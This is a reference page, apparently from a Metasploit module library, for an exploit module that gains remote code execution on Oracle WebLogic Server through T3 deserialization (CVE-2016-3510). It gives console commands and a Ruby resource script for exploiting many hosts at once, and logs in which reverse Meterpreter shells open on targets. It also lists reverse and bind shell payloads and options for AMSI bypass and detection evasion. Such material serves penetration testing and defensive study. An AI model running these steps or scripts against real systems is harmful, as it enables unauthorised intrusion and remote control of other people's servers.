Oracle Weblogic Server Deserialization RCE - MarshalledObject - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/weblogic_deserialize_marshalledobject metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Oracle Weblogic Server Deserialization RCE - MarshalledObject
Module: exploit/multi/misc/weblogic_deserialize_marshalledobject
Source code: modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
Disclosure date: 2016-07-19
Last modification time: 2021-02-16 14:36:38 +0000
Supported architecture(s): -
Supported platform(s): Solaris, Unix, Windows
Target service / protocol: -
Target network port(s): 7001
List of CVEs: CVE-2016-3510

An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object (weblogic.corba.utils.MarshalledObject) to the interface to execute code on vulnerable hosts.

Module Ranking and Traits


Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Basic Usage


Using weblogic_deserialize_marshalledobject against a single host

Normally, you can use exploit/multi/misc/weblogic_deserialize_marshalledobject this way:

msf > use exploit/multi/misc/weblogic_deserialize_marshalledobject
msf exploit(weblogic_deserialize_marshalledobject) > show targets
    ... a list of targets ...
msf exploit(weblogic_deserialize_marshalledobject) > set TARGET target-id
msf exploit(weblogic_deserialize_marshalledobject) > show options
    ... show and set options ...
msf exploit(weblogic_deserialize_marshalledobject) > exploit

Using weblogic_deserialize_marshalledobject against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your weblogic_deserialize_marshalledobject will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/misc/weblogic_deserialize_marshalledobject")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


Oracle WebLogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2016-3510), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle WebLogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.

Setup (Windows)

Use the following steps to install a vulnerable instance of WebLogic v10.3.6.0 on a Windows 7 SP1 x64 system.

  1. Install the Java SE Development Kit 7 Update 80 (64-bit version) from Oracle (use the jdk-7u80-windows-x64.exe installer). Leave all options at their default values.
  2. Download "Oracle WebLogic Server 10.3.6" from their site. Select the generic installer under the "Installers with Oracle WebLogic Server and Oracle Coherence" section, the file is named wls1036_generic.jar. You may need to register an account.
  3. From an administrative command prompt, use java to run the jar file.
    • Run: "C:\Program Files\Java\jdk1.7.0_80\bin\java.exe" -jar wls1036_generic.jar
  4. Leave all options at their default values.
    • OPTIONAL: When prompted to register for security updates, uncheck "I wish to receive security updates via My Oracle Support" and confirm that you do in fact wish to remain uninformed of critical security issues.
    • When prompted to select the installation type, use the default "Typical" setting.
    • At the end, leave "Run Quickstart" checked and select "Done".
  5. From the Quick Start menu, select "Getting started with WebLogic Server 10.3.6" to launch the configuration wizard.
  6. Complete this wizard using all of the default values.
    • When prompted to enter a password, set any desired value. Knowledge of the password is not required in order to demonstrate this vulnerability or modify any settings in the future.
  7. Start the service by navigating to the Start Menu and selecting: All Programs > Oracle WebLogic > User Projects > base_domain > Start Admin Server for WebLogic.

Setup (Linux)

Use the following steps to install a vulnerable instance of WebLogic v10.3.6.0 in a Docker container. The same image used to demonstrate CVE-2017-10271 can be used.

  1. Use git to clone the vulhub/vulhub repository from GitHub.
    • Run: git clone https://github.com/vulhub/vulhub
  2. From within the weblogic/CVE-2017-10271 subdirectory, use Docker to run the image.
    • Run: docker-compose up -d
    • TCP port 7001 should now be listening on the host machine.

Vulnerable Application


Oracle WebLogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0.

Verification Steps


  1. ./msfconsole -q
  2. use exploit/multi/misc/weblogic_deserialize_marshalledobject
  3. set rhosts <rhost>
  4. set rport <srvport>
  5. exploit

Scenarios


Windows 7 x64 running Oracle WebLogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80

msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
rhost => 192.168.192.6
msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
rport => 7001
msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit

[*] Started reverse TCP handler on 192.168.192.136:4444 
[*] 192.168.192.6:7001 - Sending handshake...
[*] 192.168.192.6:7001 - Sending T3 request object...
[*] 192.168.192.6:7001 - Sending client object payload...
[*] Sending stage (179779 bytes) to 192.168.192.6
[*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800

meterpreter > sysinfo
Computer        : GIOTTO-HS-W7
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/weblogic_deserialize_marshalledobject exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/weblogic_deserialize_marshalledobject

[*] Using configured payload cmd/unix/reverse_python
msf6 exploit(multi/misc/weblogic_deserialize_marshalledobject) > show info

       Name: Oracle Weblogic Server Deserialization RCE - MarshalledObject
     Module: exploit/multi/misc/weblogic_deserialize_marshalledobject
   Platform: Unix, Windows, Solaris
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2016-07-19

Provided by:
  Andres Rodriguez
  Jacob Baines
  Aaron Soto

Available targets:
  Id  Name
  --  ----
  0   Unix
  1   Windows
  2   Solaris

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   7001             yes       The target port (TCP)

Payload information:

Description:
  An unauthenticated attacker with network access to the Oracle 
  Weblogic Server T3 interface can send a serialized object 
  (weblogic.corba.utils.MarshalledObject) to the interface to execute 
  code on vulnerable hosts.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-3510

Module Options


This is a complete list of options available in the multi/misc/weblogic_deserialize_marshalledobject exploit:

msf6 exploit(multi/misc/weblogic_deserialize_marshalledobject) > show options

Module options (exploit/multi/misc/weblogic_deserialize_marshalledobject):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   7001             yes       The target port (TCP)

Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   Unix

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/weblogic_deserialize_marshalledobject exploit:

msf6 exploit(multi/misc/weblogic_deserialize_marshalledobject) > show advanced

Module advanced options (exploit/multi/misc/weblogic_deserialize_marshalledobject):

   Name                                    Current Setting  Required  Description
   ----                                    ---------------  --------  -----------
   CHOST                                                    no        The local client address
   CPORT                                                    no        The local client port
   ConnectTimeout                          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                                   no        The information file that contains context information
   DisablePayloadHandler                   false            no        Disable the handler code for the selected payload
   EnableContextEncoding                   false            no        Use transient context when encoding payloads
   Powershell::encode_final_payload        false            yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false            yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false            yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false            yes       Encrypt PSH with RC4
   Powershell::method                      reflection       yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false            yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true             yes       Execute powershell without interaction
   Powershell::persist                     false            yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true             yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                no        Prepend seconds of sleep
   Powershell::remove_comspec              false            yes       Produce script calling powershell directly
   Powershell::strip_comments              true             yes       Strip comments
   Powershell::strip_whitespace            false            yes       Strip whitespace
   Powershell::sub_funcs                   false            yes       Substitute function names
   Powershell::sub_vars                    true             yes       Substitute variable names
   Powershell::wrap_double_quotes          true             yes       Wraps the -Command argument in single quotes
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode                           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion                              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                                 false            no        Enable detailed status messages
   WORKSPACE                                                no        Specify the workspace for this module
   WfsDelay                                12               no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_python):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/weblogic_deserialize_marshalledobject module can exploit:

msf6 exploit(multi/misc/weblogic_deserialize_marshalledobject) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix
   1   Windows
   2   Solaris

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/weblogic_deserialize_marshalledobject exploit:

msf6 exploit(multi/misc/weblogic_deserialize_marshalledobject) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   15  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   16  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   17  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   18  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   19  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   20  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   21  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   22  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   23  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   24  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   25  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   26  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   27  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   28  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   29  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   30  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   31  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   32  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   33  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   34  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   35  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   36  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   37  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   38  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   39  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   40  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   41  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/weblogic_deserialize_marshalledobject exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/weblogic_deserialize_marshalledobject) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Oracle WebLogic Server banner cannot be found


Here is a relevant code snippet related to the "Oracle WebLogic Server banner cannot be found" error message:

76:	    )
77:	
78:	    return CheckCode::Unknown unless resp && resp.code == 200
79:	
80:	    unless resp.body.include?('Oracle WebLogic Server Administration Console')
81:	      vprint_warning("Oracle WebLogic Server banner cannot be found")
82:	      return CheckCode::Unknown
83:	    end
84:	
85:	    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
86:	    unless version

Oracle WebLogic Server version cannot be found


Here is a relevant code snippet related to the "Oracle WebLogic Server version cannot be found" error message:

82:	      return CheckCode::Unknown
83:	    end
84:	
85:	    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
86:	    unless version
87:	      vprint_warning("Oracle WebLogic Server version cannot be found")
88:	      return CheckCode::Unknown
89:	    end
90:	
91:	    version = Rex::Version.new(version)
92:	    vprint_good("Detected Oracle WebLogic Server Version: #{version}")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Andres Rodriguez
  • Jacob Baines
  • Aaron Soto

Version


This page has been produced using Metasploit Framework version 6.1.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.